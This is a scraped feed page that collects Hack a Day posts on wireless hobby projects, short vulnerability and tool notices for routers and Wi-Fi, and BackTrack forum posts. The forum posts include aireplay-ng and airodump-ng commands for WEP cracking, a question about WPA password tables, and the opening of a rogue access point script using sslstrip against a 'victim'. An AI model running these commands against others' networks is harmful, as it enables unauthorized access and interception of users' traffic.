If you want to retrofit your home with smart outlets and lightbulbs, bust out your wallet. You can easily spend forty dollars for a smart light bulb at your local home supply store, and strips of smart sockets could cost sixty. When [coogle] found a WiFi-enabled four-outlet power strip on Amazon, he couldn’t resist. Sure, the no-name strip would be locked down behind a stupid iPhone interface and will probably turn your house into a botnet, but never mind that: you can easily reprogram these power strips to be whatever you want.
After receiving these power strips and tearing them …read more
-
-
4:00
»
Hack a Day
We talk a lot about information security around here, but in reality it’s not at the forefront of everyone’s minds. Most people are content to walk around with their phones constantly looking for WiFi or Bluetooth connections despite the dangers. But if you’re not a black hat sort of person, you can do something like [Verkehrsrot] did and use all of these phones to do something useful and harmless.
[Verkehrsrot]’s project involves building a radio listening device in order to get an estimate of the amount of traffic in a particular area. The device polls for and detects WiFi and …read more
-
-
1:00
»
Hack a Day
Temperature is a delicate thing. Our bodies have acclimated to a tight comfort band, so it is no wonder that we want to measure and control it accurately. Plus, heating and cooling are expensive. Measuring a single point in a dwelling may not be enough, especially if there are multiple controlled environments like a terrarium, pet enclosure, food storage, or just the garage in case the car needs to warm up. [Tim Leland] wanted to monitor commercially available sensors in several rooms of his house to track and send alerts.
The sensors of choice in this project are weather resistant …read more
-
-
16:00
»
SecuriTeam
Broadcom BCM4325 and BCM4329 Wireless Chipsets are prone to a denial-of-service vulnerability.
-
-
8:01
»
Hack a Day
[Texane] picked up a 2.4 GHz transmitter/receiver pair for transmitting sensor data wirelessly. After using them in a project he wanted to try pushing them a bit to see what the limits are when it comes to higher bandwidths. He ended up building a wireless speaker that transmits audio at about 90 KB/s. That link [...]
-
-
5:00
»
Hack a Day
When schools and universities have hundreds of students in a lecture course, they need a way to tell alumni and other potential benefactors that faculty/student relations are just as good as they were in the 1960s, when enrollment was just a fraction of current levels. Technology solves all problems, apparently, so administrators of these universities turn to ‘clickers’ [...]
-
-
9:01
»
Hack a Day
[Chris] set out to build a monitoring system for his water heater. It doesn’t Tweet or send SMS messages. It simply lights up an LED when the water heater is active. The one thing that complicates the setup is that he didn’t want to pull any wire from the garage into the house. What you [...]
-
-
17:00
»
SecuriTeam
Netcomm BigPond Wireless Broadband Gateway is prone to an authentication-bypass vulnerability and a command-injection vulnerability.
-
-
6:00
»
Carnal0wnage
I needed to make a map the access points for a client. Since i cant show that map, i made another using the same technique.
First take your handy dandy Android device and install
Wigle Wifi Wardriving.
It uses the internal GPS and wifi to log access points, their security level and their GPS Position.
looks like this (yup i stole these)
List of access points
Also makes a cute map on your phone
once you have the APs you can export out the "run" from the data section. yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.
With the KML export you can import that directly into google earth and make all sorts of neat maps by toggling the data.
All Access Points
Open Access Points
WEP Encrypted Access Points
That's it.
-CG
-
-
5:01
»
Hack a Day
We see a lot of quadcopters, and even the occasional octocopter around here. But this build does it with just two propellers. It’s a tiltrotor build which allows the two upward-pointing propellers to tilt forward and backward. The real world equivalent of this UAV design that pops to mind is the V-22 Osprey. The motors are [...]
-
-
7:01
»
Hack a Day
For those of you that don’t know, the Heathkit HERO (Heathkit Educational Robot) was a ‘bot built in the early 1980s. [Rick] wasn’t satisfied with his model ETW-18′s programming interface, so decided to upgrade it to be able to run Python using a hacked wireless router. We’d agree that things have advanced since then, since [...]
-
-
8:01
»
Hack a Day
A while ago we caught wind of the Electric Imp, a very cool little device that packs an ARM microcontroller and a WiFi adapter into an SD card. We got our hands on an Imp last week, and now it’s time to show off what this little device can do. You can check out the [...]
-
-
15:37
»
Packet Storm Security Exploits
Alpha Networks ADSL2/2+ Wireless Router version ASL-26555 suffers from a remote administration password disclosure vulnerability. Tested on firmware version 2.0.0.30B_ES.
-
15:37
»
Packet Storm Security Recent Files
Alpha Networks ADSL2/2+ Wireless Router version ASL-26555 suffers from a remote administration password disclosure vulnerability. Tested on firmware version 2.0.0.30B_ES.
-
15:37
»
Packet Storm Security Misc. Files
Alpha Networks ADSL2/2+ Wireless Router version ASL-26555 suffers from a remote administration password disclosure vulnerability. Tested on firmware version 2.0.0.30B_ES.
-
-
10:01
»
Hack a Day
Turns out you don’t need to be Superman to see through walls. Researchers at University College London have developed a way to passively use WiFi as a radar system. Unlike active radar systems (which themselves send out radio waves and listen for them to echo back), passive radar systems cannot be detected. The system is [...]
-
-
9:00
»
Hack a Day
While cruising the Internet one day, [Raj] found a really cool pair of RF transmitters and receivers manufactured by Dorji Applied Technology. These modules – the DRF5150S and DRF4432S – work just like any other ISM band transmitter receiver pair with the addition of inputs for analog and digital input pins. [Raj] put together a tutorial for using these radio modules, perfect if [...]
-
-
10:01
»
Hack a Day
Although we’ve featured quite a few MAME controllers here, we thought we’d feature one more. It’s only a well-drawn mechanical plan at this point, but if the results are anything like the model or detail drawing, we will be quite impressed. One thing that is of particular interest is the planned parts list. Amongst them [...]
-
-
8:01
»
SecuriTeam
'Trango Broadband Wireless Rogue SU Authentication Bug'
-
-
6:01
»
Hack a Day
This 3d printed case houses the already small [TP-Link TL-WR703N] but also makes room for a custom expansion board. The expansion board is designed to make the device more hacker friendly, and who doesn’t need a nice case to hold it? Since the router board already has a USB port (intended for use with USB 3G [...]
-
-
7:01
»
Hack a Day
The guys over at embdSocial sent in a project they’ve been working on for a while. It’s a small wifi module for an Arduino or other microcontroller called Wisp. Unlike the many, many other wifi breakout boards we’ve seen, the Wisp has a truly incredible amount of potential. With an API that allows an Arduino [...]
-
-
11:01
»
Hack a Day
Ah, the days when a television was a solid piece of furniture. When it comes to moving, we can’t say we miss it. But looking at this wooden TV cabinet with storage for its 7-function remote we can’t help but think that today’s TVs seem more… trivial… when it comes to the layout of the [...]
-
-
15:01
»
Hack a Day
The NRF 24L01+ radio transceiver can be found in a lot of wireless project builds. But it’s only meant to work at a range of a few meters. [Achu Wilson] found that he could greatly extend the range by as much as 2 kilometers. All he needed to do was build this high-gain antenna. He already [...]
-
-
10:02
»
Hack a Day
Despite the obvious use of a lot of wire, this project is actually a wireless charging system. [Jared] built it as a way to explore the concepts behind transferring power inductively. Alternating current on one of the white coils induces current on the other. This is then rectified, and regulated for use as a 5V charger. In this [...]
-
-
10:06
»
Hack a Day
Most of the quadcopter projects that we’ve seen use a joystick-based control system. This lets you fly the thing around like any RC vehicle. But [Saulius] is augmenting his control system by pulling and displaying telemetry data. It doesn’t really change the way the vehicle is controller, but it lets the craft roam much further [...]
-
-
10:02
»
Hack a Day
Years ago, someone at [Chuck]‘s job came up with the brilliant solution of an indicator to display if the unisex bathroom is currently vacant, a men’s bathroom, or a women’s bathroom. The old system worked well, but [Chuck] thought it would be a great idea to display the current status of the bathroom on the [...]
-
-
9:01
»
Hack a Day
[Jeff] from Gadget Gangster sent in a great tutorial on connecting a cheap Bluetooth module to a Parallax microcontroller. In addition to getting a terminal to the Propeller up and running from his computer, [Jeff] was able to toggle IO pins and even control servos and Android devices – perfect for your next wireless robot. [...]
-
-
14:01
»
Hack a Day
[Roel] wanted to put a wireless weather station in his greenhouse. Even though the weather station was supposed to transmit over fairly long distances, the geometry of his back yard and a few stone walls killed the radio signal even after putting a good antenna on the receiving side of his wireless weather station setup. [...]
-
-
9:06
»
Hack a Day
[Chris] put together a bunch of common components to create this wireless pan and tilt system for a security camera or a robot. The motorized base is simple enough, using two servos to make up a mount for the digital camera. In this case he used a parts package which is designed to mount the servos [...]
-
-
9:01
»
Hack a Day
[Peter Sobey] had a solar hot water heater installed in his home, which worked great until he relocated his kitchen to a neighboring room. Now a good bit further from the tank, the hot water reaching his sink was tepid at best due to the increased distance and temperature limiting mixer valve in the new [...]
-
-
15:01
»
Hack a Day
It looks like a genetic leap has unleashed the age of mutants, but this is really just a few guys trolling New York City with some custom RC aircrafts. The video after the break shows the fliers up close. They’re pretty much full size, we’d guess 5’10″ from head to heel. The outstretched arms and [...]
-
-
9:01
»
Hack a Day
Remember those old wireless controllers made for the consoles of our youth like the NES and Super Nintendo? They didn’t work well, mostly owing to the fact they were built using the same infrared technology that is found in a remote control. Now that all the modern consoles are wireless, [micro] over at the nftgames [...]
-
-
9:01
»
Hack a Day
[Abhimanyu Kumar] has been hard at work building and posting about his quadcopter. So far he’s published ten installments for this build, letting us relive the adventure vicariously. But it’s number 11 that we’re really excited about as he plans to share the first free-flight footage in that one. The bug was planted in his [...]
-
-
6:28
»
Hack a Day
Servo control is good, but wireless control is even better. This hack by [PyroElectro Tutorials] shows you how to do this wirelessly using two Xbee modules. There’s also a great example in the video after the break of this “hacking platform” used to control an animatronic head’s eyes. (we’ve featured the eyes here before). In [...]
-
-
15:47
»
Packet Storm Security Recent Files
hwk is used for wireless audits, fuzzing and stress testing under Linux. It provides various modes as wireless deauthentication and authentication flooding using a monitor mode interface as well as probe response and beacon fuzzing. Furthermore it comes with some basic injection testing and focusing modes.
-
15:47
»
Packet Storm Security Tools
hwk is used for wireless audits, fuzzing and stress testing under Linux. It provides various modes as wireless deauthentication and authentication flooding using a monitor mode interface as well as probe response and beacon fuzzing. Furthermore it comes with some basic injection testing and focusing modes.
-
15:47
»
Packet Storm Security Misc. Files
hwk is used for wireless audits, fuzzing and stress testing under Linux. It provides various modes as wireless deauthentication and authentication flooding using a monitor mode interface as well as probe response and beacon fuzzing. Furthermore it comes with some basic injection testing and focusing modes.
-
-
8:11
»
Hack a Day
The Nike+ hardware is obviously an interesting device. We haven’t heard a whole lot about hacking one until now, but [Dimitry] has decided to change that. Many would assume that the data transmitted off of these sensors is quite simple, however there’s a bit more than meets the eye. Amongst other challenges, all the data [...]
-
-
10:11
»
Packet Storm Security Recent Files
This paper examines network layer security provided by IPSec and link layer security provided by WPA, addressing the characteristics of each approach when applied to wireless networks. It also discusses types of attack done on Wireless/Wi-Fi and security mitigations.
-
10:11
»
Packet Storm Security Misc. Files
This paper examines network layer security provided by IPSec and link layer security provided by WPA, addressing the characteristics of each approach when applied to wireless networks. It also discusses types of attack done on Wireless/Wi-Fi and security mitigations.
-
-
4:04
»
Hack a Day
Hackaday reader [equinoxefr] posted some images to our flickr pool showing off some modifications he made (Google Translation) to his La Crosse WS2305 weather station. Having built other router-based weather stations in the past, [equinoxefr] was looking for a better way to gather weather data after one of the routers gave up the ghost. With a brand [...]
-
-
8:01
»
Hack a Day
This bluetooth headset hack, although simple, may provide some hacking inspiration. Turning a Bluetooth headset into a wireless input for one’s stereo is definitely something that makes one think “why didn’t I think of that?” It’s also good if you’ve got a tight hacking budget as there’s not a lot of stuff to buy. In [...]
-
-
8:01
»
Hack a Day
There’s something calming about looking up into the night sky and seeing an array of shining stars off in the distance. [Marou] is a big fan of stargazing, but sometimes conditions are not optimal, so he decided to bring the stars inside. His idea was to build a ceiling lamp that didn’t bask the room [...]
-
-
10:01
»
Hack a Day
[Mr.Pantz] pointed us to a web page we thought you would find interesting. It deals with hacking PC lock using a Universal Software Radio Peripheral (USRP) . Following the good practice of logging off or locking your workstation while your not at it, it is darn hard to get users to actually do it. These [...]
-
-
10:01
»
Hack a Day
The wooden frame seen above hosts a parabolic reflector making up one side of a wireless network link. This is a Fab Lab project called FabFi which uses common networking hardware to setup long-distance wireless Ethernet connections. It’s a bit hard to tell in the image above, but the reflector focuses radio waves on the [...]
-
-
4:06
»
Hack a Day
We love ballistic trajectories and the smell of black powder in the morning, so we’re really interested in the wireless rocket launch pad sent in by [Brent Strysko]. [Brent] used an ATmega with an enc28j60 ethernet shield and wireless router to launch the rocket without a physical connection with ‘the button.’ Everything on the launchpad [...]
-
-
4:05
»
Hack a Day
[AUTUIN] sent in a tip for his wifi sniffing digital picture frame. A soon-to-be-trashed Pentium II laptop was rescued from Free Geek Vancouver. A lot of coffee shops around Vancouver feature local art and free wifi, so [AUTUIN] decided to combine the two. The project is designed to hang on the wall of a cafe [...]
-
-
15:01
»
Hack a Day
It’s no secret that wireless mice can eat through batteries pretty quickly. Rather than keep a fresh supply of AAs on hand at all times, [Phil] decided he would convert his mouse to use a rechargeable lithium polymer battery instead. This isn’t the first time we’ve seen a cell phone battery crammed into a mouse [...]
-
-
4:06
»
Hack a Day
We never really get bored with remote-controlled rovers around here, especially when they involve reusing some old hardware as well as lasers. [Tycoon] wrote in to share his creation, which he has dubbed “Texas Ranger”. Texas Ranger is built around an old Linksys WRT54GL router, which provides the rover’s WiFi connectivity as well as the [...]
-
-
12:22
»
Hack a Day
Hackerspaces are always looking for novel ways to let their members know that they are open for business, and this notifier [Angus] from Make, Hack, Void recently put together is no exception. While dumpster diving one day, he came across a fantastic-looking lab power supply from the ‘70s. He gutted it, saving the variable transformer [...]
-
-
10:10
»
Hack a Day
What do you do when you can’t afford broadband and no-cost WiFi is just out of reach? That was the problem Rice University grad student [Ryan Guerra] was tasked with solving. A local Houston resident could barely tap into the free service offered in her area, so [Ryan] set out to extend the signal’s range [...]
-
-
4:03
»
Hack a Day
[Wes] built a cool looking Tactical Wifi Cantenna with some parts from a broken airsoft pistol. The antenna is a cookie can type with an added cone to increase performance, as seen in this tutorial. Once the antenna was built it was time to add some kind of handle, [Wes] just so happened to have [...]
-
-
6:01
»
Hack a Day
So let’s say you have a submarine, or a nuclear containment chamber which has walls made of thick metal. Now let’s say you want to transmit power or data through this wall. Obviously you’re not going to want to drill a hole since this wall is either keeping seawater out, or potential contamination in, but [...]
-
-
15:45
»
Hack a Day
In Colorado, amateur luge competitions are serious business. Every winter, [Ryan's] friends dig a long luge track through the many feet of snow that occupies their yard, and have competitive sled races to see who can make it down the giant hill in the least time. They call it the Mario Cup, after one of [...]
-
-
6:35
»
Hack a Day
[Mike] sent in a tip about Newstweek, and we’re turning to our readers to tell us if this is real or if we’re being trolled. The link he sent us points to a well-written news-ish article about a device that plugs into the wall near an open WiFi hotspot and performs something of a man-in-the-middle attack on devices [...]
-
-
12:00
»
Hack a Day
Don’t just build a UAV, use it to blow things up. In this case a tri-copter seeks out colored balloons and pops them using low-grade fireworks. We’ve seen this type of flying armament before, but not in a ‘copter form factor. It looks like the targeting and firing is done by an operator, and is [...]
-
-
14:00
»
Hack a Day
Yep, these cereal boxes light up. They’re using a new branded-technology called eCoupling that provides electricity via induction, which means the shelves have a coil with AC power running through it. The “printed coils” on the boxes allow inventory control and data exchange presumably thanks to a low-power microcontroller. But in the video after the [...]
-
-
14:00
»
Hack a Day
The ubiquitous presence of wireless devices combined with easy access to powerful RF development platforms makes the everyday world around us a wireless hacker’s playground. Yesterday [Travis Goodspeed] posted an article showing how goodfet.cc can be used to sniff wireless traffic and also to jam a given frequency. We’ve previously covered the work of [Travis] [...]
-
-
12:18
»
Hack a Day
The challenge: can you build a flying turkey that drops pumpkin pie bombs? That’s the question that Utah Aerials asked themselves and they did manage to make it happen. Of course they’re not starting from scratch, but adding a little holiday cheer to an existing quadcopter in the form of a spray painted turkey fuselage. [...]
-
-
10:00
»
Hack a Day
Tired of hearing that flat sounding wireless doorbell when visitors happen to come by? Don’t get rid of it, improve it by adding a real bell. This hack rigs up a small hand bell to the wireless doorbell receiver. It was prototyped using LEGO pieces to shake the sound out of the bell, but the [...]
-
-
8:00
»
Hack a Day
More and more today, it is becoming harder to avoid having some sort of RFID tag in your wallet. [bunnie], of bunnie:studios decided to ease the clutter (and wireless interference) in his wallet by transplanting the RFID chip from one of his subway cards into his mobile phone. Rather than the tedious and possibly impossible [...]
-
-
6:40
»
Hack a Day
The back story behind [Mike] experimenting with plants as AM radio transmission antennas antennae is rather interesting and worth the short read. But for those who just want the facts, [Mike] took an ATMega324, modified the PWM output into a sinusoidal AM signal (using a simple form of RLC circuitry), and connected the circuit to [...]
-
-
13:00
»
Hack a Day
[Rafael] built a system that uses radio frequency for communications. The code he was using with the inexpensive receiver/transmitter pairs already had some error correction but from time to time an entire message would be missed by the receiver. He set out to make these RF communications more robust. A little more than a year [...]
-
-
6:30
»
Hack a Day
A small, cheap spectrum analyzer with an LCD can be a fun thing to play with. But to be truly usefully you need access to raw data, and lots of it. [Travis Goodspeed] set out to make that possible by pulling data with a GoodFET and a Python script. He started with [Michael Ossmann's] IM-ME [...]
-
-
13:00
»
Hack a Day
[Ben Kurtz] is doing a little WEP cracking but in a bit of a different way than we’re used to. WEP cracking makes us think of war driving; driving around with your laptop open, looking for WiFi access points, and stopping to run some software when you find them. [Ben's] way is similar but different [...]
-
-
11:00
»
Hack a Day
For all those times you need to broadcast your own access point where there’s no outlet [Larry] shows us how to make a solar-powered hotspot. He started by slapping a solar panel on the lid of a cigar box and attaching it to five rechargeable AA batteries inside. These power the mainboard from a router which is [...]
-
-
10:00
»
Hack a Day
[Thomas Pfeifer] has taken the PPM signal produced by model aircraft wireless controllers, and with an ATMega8, converted the signal to act as a USB joystick. Which means you can now use a standard R/C remote control to fly model aircrafts on your computer. Of course now with PPM decoded you could also use the [...]
-
-
12:00
»
Hack a Day
This module is a sensor package for monitoring the electrical activity of the heart. It is the product of an effort to create a Wireless Body Sensor Network node that is dependable while consuming very little electricity, which means a longer battery life. To accomplish this, the microcontroller in charge of the node compresses the data [...]
-
-
14:00
»
Hack a Day
Feeling bad that his access point was being made fun of by models with beefier external antennas, [Customer Service] decided to do something about it. After cracking open the Asus wl-330ge he found it would be quite easy to add a connector. This access point has two internal antennas that are quite small and use [...]
-
-
13:00
»
Hack a Day
[gpsKlaus] built this little FM radio (translated) based on the AR1010 IC. That chip is controlled via I2C by an ATtiny45 microcontroller. His tuning implementation relies on presetting 16 stations in the firmware and selecting them with the white potentiometer. The FM chip came on a breakout board from SparkFun. Not bad at around $15 [...]
-
-
11:00
»
Hack a Day
That’s a camera perched atop this aircraft’s wing. [Trappy] built the video system into his Ritewing Zephyr and his test flights in the Austrian Alps make for some breathtaking video. The foam wing is pretty easy to work with and the tool of choice here is a hot knife to cut out cavities for the [...]
-
-
12:16
»
Hack a Day
Here’s a great tutorial on building your own quadrotor helicopter. This build isn’t necessarily less expensive than others we’ve seen since quality motors, propellers, and control circuitry aren’t cheap. But the design and assembly is well documented and presents a well-planned building procedure. The carbon-fiber tubes that make up the frame have extensions to protect [...]
-
-
13:00
»
Hack a Day
[Tommy Gober] built this Yagi-Uda antenna that has some handy design features. The boom is a piece of conduit with holes drilled in the appropriate places. The elements are aluminum arrow shafts; a good choice because they’re straight, relatively inexpensive, and they have #8-32 screw threads in one end. He used some threaded rod to [...]
-
-
5:40
»
Hack a Day
If you’re working on a device that includes RF wireless, [Colin's] Guide to PCB Trace Antenna Design might clear some headaches when sending off for PCBs. While it is directed at devices transmitting at 2.4GHz, the techniques and recommended equipment (read: espresso smith charts and network analyzers) should work for almost any frequency. While trace [...]
-
-
7:51
»
Hack a Day
[Michael Vincent] turned his TI-84 Plus into a spectrum analyzer. By running some assembly code on the device the link port can be used as an I2C bus (something we’ll have to keep in mind). After being inspired by the cell phone spectrum analyzer he set out to build a module compatible with the calculator [...]
-
-
11:00
»
Hack a Day
Add a bit of interest to your radio equipment with one of these unorthodox CW keys. [OH6DC] has been hard at work posting almost sixty of these hacks. Above you can see an alarm clock whose snooze button acts as the key, and a nail clipper used as a key. There’s a banana , a [...]
-
-
10:00
»
Hack a Day
[Andrew] used a DSL router to make his own Terminal Node Controller. This will become part of an APRS-IS network, an Internet-based network built by amateur radio operators. The router used here is a Dlink DSL-502T with an AVR based TNC module attached to the serial port header. The phone line connector and its accompanying [...]
-
-
12:18
»
Hack a Day
Here’s a homebrew remote control that [Jad Berro] is developing. He’s using a tank robot to test it out but eventually he plans to use it to control an RC plane thanks the 434 MHz wireless module inside. There’s no shortage of input, with two analog sticks from a PlayStation controller, several momentary push buttons, [...]
-
-
7:00
»
Hack a Day
A student team at University of Massachusetts have built this wireless face tracking camera system. Using a small 2-axis motorized camera meant to be mounted on model airplanes, an arduino, and some custom software, they can track faces and keep them in frame in real-time. This is pretty cool, but maybe not quite as groundbreaking as they [...]
-
-
13:00
»
Hack a Day
While hacking a wireless presenter doesn’t sound like something worthwhile or interesting, [Niels Teusink] demonstrates that these little devices often are a lot more powerful than we give them credit. With an Arduino, plenty of research, and some heavy sniffing of a wireless presenter’s SPI and then wireless interface [Niels] is able to emulate an [...]
-
-
8:00
»
Hack a Day
[Zach Charat] didn’t want to carry around yet another card with him so he transplanted the RFID guts from his card to his phone. Soaking the card in nail polish remover for twelve hours got him nowhere, but when he broke out the acetone the card was falling apart in 30 seconds. Above you can [...]
-
-
7:36
»
Hack a Day
If your soldering skills are up to snuff you can add a motion control feature to your radio controlled transmitter. [Starlino] used a combination accelerometer and gyroscope module as an alternate source of analog control information. He built a filter to dial in the analog voltage range to match that of one of the sticks [...]
-
-
16:34
»
remote-exploit & backtrack
Salve ho un eeepc 1201N, con questa scheda wireless--->RealTek RTL8192SE
Purtroppo non riconosce la scheda, dove posso trovare i driver?Grazie
[OT]Punto secondo, mi potreste dire come far leggere a backtrack una pendrive? Su ubuntu appare il device sul desktop su BT no:confused:[/OT]
Grazie ancora
-
-
23:27
»
remote-exploit & backtrack
hi all
i have TP-link rt73 usb and D-link dwa-110 and D-link DWL-520+ and so many other adapters !
i tried to pentest my network with D-link 2640tl AP with wep encryption (my pass is 1234567890) !! the problem is none of this adapters are able to athenticate with Ap ( i installed drivers patch too)!! and the test option in aireplay-ng gives me 0% !! i read both rt73 and dwa 110 is capable of injecting and .. (even airecrack-ng's official web site advised to buy rt73 based adapter! ) can any one give me a tip !!
i used following commands:
$myAPmaC and $MyADapterMac are exported before!
Code:
aireplay-ng -1 50 -a $myAPmaC -h $MyADapterMac wlan0
thanks anyway and excuse my weak english!!
-
-
13:40
»
Hack a Day
[Jerome Demers] sent us his extremely detailed semester project. The two part system consists of PICs connected to XBee modules and accelerometers. By using the device a coach can monitor an athlete and correct their minute mistakes. Did we mention [Jerome] was very detailed? He also goes into the particulars of designing the circuit, using [...]
-
-
13:00
»
Hack a Day
[Andrew] certainly brings a bit of a James Bond feel to connecting to your WiMax base station. He built this antenna along with an auto-positioning system to get the strongest signal possible. The device, which appears a bit fragile, breaks down into a nice little case. When you get to your next checkpoint you can [...]
-
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
2:07
»
SecDocs
Authors:
Mike Kershaw Tags:
wireless Metasploit WiFi Event:
Black Hat DC 2010 Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
-
9:30
»
Hack a Day
[Paul Klemstine] is working on some PC-side software hacks for the IM-ME. We’ve seen a lot of hardware hacks for this device, such as controlling the display, firmware flashing, and using it as a spectrum analyzer, but if you don’t want to alter the device right away you can try [Paul's] collection of hacks. Working [...]
-
-
8:13
»
Hack a Day
[William Etter] and his classmates built a quadcopter as a class project. We love the details of these builds and they came through with some thorough documentation. Some highlights that we enjoyed were reading about ABS body design and construction, their analysis of two versus three blade propellers, and their breadboarded control mechanism. You can [...]
-
-
10:00
»
Hack a Day
We’ve noticed that wireless routers pump out a bunch of heat. [Jernej Kranjec] wanted to make sure that he didn’t fry it once he started adding more load to his router using OpenWRT. What he came up with is the idea of using an old CPU as a passive heat sink. He applied a bit [...]
-
-
12:21
»
remote-exploit & backtrack
I'm building a wireless bridge between two sites, i don't want to have to invest a bag of money for a dish so i am going to make my own.
i can't seem to find any suitable ones on the net so i thought i'd ask here.
can anyone suggest where i could find mesh parabolic cooking utensils on the net? needs to be mesh because it will be outside, true parabola shape and at least 10" in diameter.
Thanks. :)
-
-
6:00
»
Hack a Day
[.ronin] built an all-in-one WiFi and Bluetooth sniffer. He used a Nerf rifle as a base and added two Pringles cantennas, a tablet PC, and other various bits to tie it all together. Now he wanders the streets, explaining the device to bewildered passersby. After showing the device at CarolinaCon 2010 (here’s a PDF of [...]
-
-
7:01
»
Hack a Day
Alright class, quiet down and open your books to the chapter on Manchester Encoding. [Brian J Hoskins] did just that when building this RC5 decoder. This protocol is commonly used in television remote controls. You use them on a daily basis, don’t you think it’s time you understood what’s going on? Check out his writeup [...]
-
-
10:13
»
Hack a Day
If you’re interested in learning about Very Low Frequency communications take a look at what Larry has to offer on his site. He’s put together a guide to VLF receivers that is short enough to read and clear enough to understand with rudimentary knowledge of circuits. He builds a simple receiver as a working example [...]
-
-
0:27
»
remote-exploit & backtrack
i just recently downloaded the Church Of Wifi password list which is 40gb in size...however when i try to open any of the files in kate or hex editor i don't get much apart from random ascii. I know people have had sucessfully used the Church Of Wifi wpa tables or else the torrent wouldnt still be up, however trying to use the files in airolib-ng have not been sucessful.. If anyone could provide some advice on how to use these tables or with which program would be great
-
-
15:00
»
Hack a Day
If you’re into ham radio and want it when you’re on the go give this antenna mount a try. [Cirictech] started with a design from the November 2009 issue of QST and added his own fabrication touches. Everything except the antenna itself is available from the hardware store for just a few bucks, and you [...]
-
-
2:03
»
remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However I fail to get the association succeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
-
-
10:34
»
remote-exploit & backtrack
If I am running fakeAP on one computer, would I be able to connect to it from another computer? and would that computer be on the same network?
-
-
17:53
»
remote-exploit & backtrack
i tried searching the forum but no luck it seems, maybe i dont know how to word it...anyhoo..
anyone seen gerix freezing up when you do a a rescan network...it will work sometimes for over an hour, all parts of the program. sometimes not at all, even after more than 1 reboot. any tips/help would be great.
-
6:50
»
remote-exploit & backtrack
Innanzitutto non capisco se gli IVS sono i Beacons o i Data...
se sono i Beacons è tutto veloce, ma non credo!
Se sono i Data c'è un bel problema perchè ne trova più o meno 1 ogni due minuti, e la cosa non penso sia buona.
Per favore mi dite come posso accelerare la cattura degli IVS.
P.S. Ho un atheros 9k
-
-
2:49
»
remote-exploit & backtrack
Hi friends
This is my setup for adhoc mode wlan
Quote:
NODE A
IP 192.168.1.3
NetMask 255.255.255.0
Ubuntu 9.10
mode adhoc
chipset Atheros9k
|
Quote:
NODE B
IP 192.168.1.2
NetMask 255.255.255.0
Sidux
mode adhoc
chipset BROADCOM4312
|
These two communicate very well
However if i change the scenario to
NodeA having BT4 and Node B sidux ..then NODE A is not putting the card in adhoc mode..i guess the issue with ath9k and ath_pci comes out
if i do this
NODE A sidux and NODE B sidux both go in adhoc mode but do not ping each other
and then i tried this also
NODE A Debian Etch and NODE B sidux both go in adhoc mode but do no ping each other
Please can someone tell me how to make the adhoc mode work o..as of now only ubuntu karmic seems to behave..
thanx
-
-
14:23
»
remote-exploit & backtrack
Hello ... very warmly
I'm new to this forum .. The first thing I would say is if you located the badly about it immediately apologize and please move if need be ...
But going to the heart of the matter.: Today I installed Back Track 4 on VB, I do everything I did and it works like a doll, so to speak. But one thing, namely MAIN - Not working: (. Is it WIFI, and here once I would like to emphasize that I have a USB WiFi antenna, the exact model of antennas - AirLive WL-1600USB
Please help, because they probably know from personal experience that BackTrack without an Internet connection is useless
P.S. VBoxGuestAdditions - has already been installed
Edit :
Slight correction: As for the Internet: I have internet signal, all you need to move the walls, but I still can not set the `interfaces in WIFI card ...,
Still waiting for answers...,
Thanks in advance, and Yours sincerely,
Szpaner
-
-
16:39
»
remote-exploit & backtrack
Hello,
I have an Intel WiFi Link 5100 AGN in my Sony laptop. It works in BT4 but in BT3 it doesn't show up for airmon-ng.
Anybody know why?
Thanks
-
15:00
»
remote-exploit & backtrack
Having installed BackTrack 4 Final to HD, when attempting to connect to a detected network, i receive a message "encryption has to be enabled before connecting to this network"? Can anyone please help? Thanks.
-
8:57
»
remote-exploit & backtrack
Hey guys
I was getting tired of typing all the command in constantly so I made a litle bash script for it, it is made for Ubuntu so a few changes will be needed, for example BT uses dhpcd in stead of dhcpd3
Now the problem, a lot of the time the other computers don't see the wireless when applied to interface mon or so.
### edit ###
Found the problem only occurs with Windows XP
now the only thing that doesn't work (yet?) is the dns service, the victim can't resolve the dns name but can access IP address directly
Anyone here who has more expirence with the softAP's and is willing to help me???
Code:
#!/bin/bash
# SoftAP for wireless-testing
# Modded by Junke1990
#
# Hardware: Eee PC 1000h
# NICs
# eth0 (LAN)
# ra0 (WLAN) rt2860STA
# wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963
# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
# services to listen on
dsn=1
ims=0
msg=1
# Make sure only root can run our script
